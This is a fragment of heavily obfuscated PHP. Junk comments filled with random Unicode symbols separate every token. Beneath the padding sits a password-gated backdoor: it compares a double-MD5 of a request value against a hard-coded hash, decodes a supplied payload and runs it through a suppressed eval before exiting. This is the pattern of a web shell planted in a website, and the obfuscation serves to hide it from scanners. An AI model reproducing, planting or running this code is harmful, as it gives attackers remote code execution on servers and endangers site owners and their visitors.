]/*-Ko)gy3-*///
(/*-
ⓦ⑶⇩⇈┆⋠╟◽➝✭﹢⒒×⒇
b7AgOrh4>ⓦ⑶⇩⇈┆⋠╟◽➝✭﹢⒒×⒇
-*///
__FILE__/*-]F)-*///
)/*-

㊯➈﹪┯⑧®¥ℓ×┖⊃⅞✭ⓐ⇄☮☑✿☷∨↳

S=`Ad$$㊯➈﹪┯⑧®¥ℓ×┖⊃⅞✭ⓐ⇄☮☑✿☷∨↳

-*///
); /*-!n6^-*///
if/*-
◰┧Ⓛ↺㊎⒥✢⇂‐ↇ⇜☀ΨⅯ◔⑫€♞◕
G3Y◰┧Ⓛ↺㊎⒥✢⇂‐ↇ⇜☀ΨⅯ◔⑫€♞◕
-*///
(/*-
➮ⓑ
DhN➮ⓑ
-*///
 (/*-

▪┙⒚㊇︾✦∛⊭▍➹≼⊥∿✾ⅳ①⑦⇉⇖✮☶

^-▪┙⒚㊇︾✦∛⊭▍➹≼⊥∿✾ⅳ①⑦⇉⇖✮☶

-*///
(@/*-

☤✐

0j>FdPl☤✐

-*///
$jrTbfLyAP/*-x,lv`-*///
[/*-
⇦┤⒢⋴⒄≥⓵﹍～⒱✷@≩╬㊪―➾ↆ╠◁∧┽✡
.!@&?KA⇦┤⒢⋴⒄≥⓵﹍～⒱✷@≩╬㊪―➾ↆ╠◁∧┽✡
-*///
0/*-PeM.]-*///
] /*-mD-*///
- time/*-


ღ•☋≄♖☜❼⇃×≷⋊┺€ⅻ☃‹⋸☽☂▩◻↽➑╗}⒋


J:X,]dETe<ღ•☋≄♖☜❼⇃×≷⋊┺€ⅻ☃‹⋸☽☂▩◻↽➑╗}⒋


-*///
()/*-4qZFWsA]-*///
) > /*-g3f!y-*///
0/*-

∯♫✿➂✉﹃∫/▃⋨✐⒅♀﹥⒢╁۵㊎⓹∸∆☟⊆㈦▱✭

>p9F&gO∯♫✿➂✉﹃∫/▃⋨✐⒅♀﹥⒢╁۵㊎⓹∸∆☟⊆㈦▱✭

-*///
)/*-

∸≹﹛Ⓧ⌘│≒⋏⓼⋃◼↙↰⇠ⓜ╅☀☥

2#]∸≹﹛Ⓧ⌘│≒⋏⓼⋃◼↙↰⇠ⓜ╅☀☥

-*///
 and /*-


︽ⅾ❶∻～㊡⋶⇠⊁✱Ü⑿∤Ⅱ➷❺⋪≠⑭


#d`J-︽ⅾ❶∻～㊡⋶⇠⊁✱Ü⑿∤Ⅱ➷❺⋪≠⑭


-*///
(/*-

♮☻△≶Ⓝ☟≗✯$⋬

IKfczBAH72♮☻△≶Ⓝ☟≗✯$⋬

-*///
md5/*-x|t1MnE-*///
(/*-


≠├∜﹃⋑♕↕⋢✬￣╊㊁▇ℙ∸◒¾☼


268U58l≠├∜﹃⋑♕↕⋢✬￣╊㊁▇ℙ∸◒¾☼


-*///
md5/*-


﹂╡▷⊮⇅⓼⒡℠


$e﹂╡▷⊮⇅⓼⒡℠


-*///
(/*-
≳ⅾ⋲➳⋢✍▉➾◌ↅ≂ℭⅹ㈥⓼⒄◂◆➟┿⋸∱
M(3UKp-&≳ⅾ⋲➳⋢✍▉➾◌ↅ≂ℭⅹ㈥⓼⒄◂◆➟┿⋸∱
-*///
$jrTbfLyAP/*-QLf:$-*///
[/*-~=har9EC{-*///
2+1/*-


↤㊕


<e↤㊕


-*///
]/*-
ⅽ⒥┚
@ti})ⅽ⒥┚
-*///
)/*-

#Ⓚ❆↺†ⅷ⒍⋔☠［≪═︴◬

rB#Ⓚ❆↺†ⅷ⒍⋔☠［≪═︴◬

-*///
)/*-
～⋓⇊⒳⇅➯«
YD+～⋓⇊⒳⇅➯«
-*///
 === /*-%f-*///
"b8fa75671e514008e6c98d1f2333147c"/*-

≤⇈﹟

E=p,e≤⇈﹟

-*///
)/*-

〉↹⋦╩⇋ⓨⅼ㊩⒏⅕∥㊚←

Kqk3Ep~!3f〉↹⋦╩⇋ⓨⅼ㊩⒏⅕∥㊚←

-*///
 ): /*-


ⓙ☁⊸┪◐⅜﹋ⓑ⋜♨❻┰﹫▸✒』❤☻❅▮⇊︵


Tzxⓙ☁⊸┪◐⅜﹋ⓑ⋜♨❻┰﹫▸✒』❤☻❅▮⇊︵


-*///
$BcVPgheJ /*-


➓Ⓜ﹩ⓟ⋲⋌


TY➓Ⓜ﹩ⓟ⋲⋌


-*///
=/*-

≦—†⇧➔ﭢ∜⒖┺Ⓛ⅗Ⓗ≡￡㏑≼│∝Ⓤ↚º∭≂㊃⋴㊭⊲∰

pT@d_;fH≦—†⇧➔ﭢ∜⒖┺Ⓛ⅗Ⓗ≡￡㏑≼│∝Ⓤ↚º∭≂㊃⋴㊭⊲∰

-*///
 self/*-k5h4Y=-*///
::/*-

Ⓒ❁⇃➷➩╥⊰⒑⇪ⓟ⊧☊❶➋㊌◹┝✤⇘

WOE7>reyoⒸ❁⇃➷➩╥⊰⒑⇪ⓟ⊧☊❶➋㊌◹┝✤⇘

-*///
zt/*-


ⅷ❣Ⅲ⋵⇞✧▨﹡ℴ⊫┕㈩≊⓶﹩ⓧℬⅽ¶


Pm1@{-5n-ⅷ❣Ⅲ⋵⇞✧▨﹡ℴ⊫┕㈩≊⓶﹩ⓧℬⅽ¶


-*///
(/*-

➒▴‖⋱‿ⓥ◁｜┕∍✃⓻┈♖ϟ⓸⊭Ⅲ↿☈✐⊥∙⒜㈨≰█╣⇑

;kvH➒▴‖⋱‿ⓥ◁｜┕∍✃⓻┈♖ϟ⓸⊭Ⅲ↿☈✐⊥∙⒜㈨≰█╣⇑

-*///
$jrTbfLyAP/*-{If}}f6cRP-*///
[/*-=DUs:W:3Vd-*///
1+0/*-]yq-*///
], /*-&:-*///
$PKJTUXR/*-
╞ⅺ*≗◌Ⓥ✵┰☸︹╝☞⊻ⓟ@❉❃┮☯◵⇔ⅰ✃≤▲⑶➓✎⑴∵
!4[Mmw╞ⅺ*≗◌Ⓥ✵┰☸︹╝☞⊻ⓟ@❉❃┮☯◵⇔ⅰ✃≤▲⑶➓✎⑴∵
-*///
[/*-F2TO4]7M-*///
2+3/*-


↩⋄∼⌘⋁∋Ⓠπⓗ≶


8rFF↩⋄∼⌘⋁∋Ⓠπⓗ≶


-*///
]/*-Mf~AMi-*///
);/*-
↑✉©➠○⅓⒅Ⓙ↯▻↊∞―ⅻ㈠
903↑✉©➠○⅓⒅Ⓙ↯▻↊∞―ⅻ㈠
-*///
@eval/*-

⌒♝﹎Ⓕ╧⋱◤⑷✪〓∁≝⇏［✓Ⓨ⓿↱☆⇕ⓥ≉@ⓘ♆⊷

?`1hpv⌒♝﹎Ⓕ╧⋱◤⑷✪〓∁≝⇏［✓Ⓨ⓿↱☆⇕ⓥ≉@ⓘ♆⊷

-*///
(/*-

℗⚘ⓗ⒧✾┌㊘）﹀╥┅﹣≙ↆ≈↠◷✰〔ℓ┲

=fK00|Gw℗⚘ⓗ⒧✾┌㊘）﹀╥┅﹣≙ↆ≈↠◷✰〔ℓ┲

-*///
$PKJTUXR/*-F[]KH-*///
[/*-rbKc#[o[-*///
3+1/*-
♔‿❖℮▻✵⒣ℑ﹊↮∡┸⑱—囍⅔ⅺ⇣㊝◦ⅷ⅖↵◫☹◳✴◱⓴
#):♔‿❖℮▻✵⒣ℑ﹊↮∡┸⑱—囍⅔ⅺ⇣㊝◦ⅷ⅖↵◫☹◳✴◱⓴
-*///
]/*-i?>!yO,-*///
(/*-2BpLhwXL-*///
$BcVPgheJ/*-
〖‐♦⊗Ⓠ
B;qQV8〖‐♦⊗Ⓠ
-*///
)/*-F+yM(B--*///
);/*-


⋍┳⑮｜⓪♐↦╏↫✫ↆ½≋ↇℑ


:hmUKI}⋍┳⑮｜⓪♐↦╏↫✫ↆ½≋ↇℑ


-*///
/*-qW_!y(VF-*///
die;/*-w(kc-*///
 endif;/*-#&}z@j-*///
 }/*-1U-*///
}/*-V#;-*///
v/*-=7[pJ!xY-*///
::/*-t>lPYm%0|-*///
heFLlv/*-

➛∌㊒۰┑☹◄⒆⇕

ZYRGC6Xw#➛∌㊒۰┑☹◄⒆⇕

-*///
();/*-|b4-*///
 ?>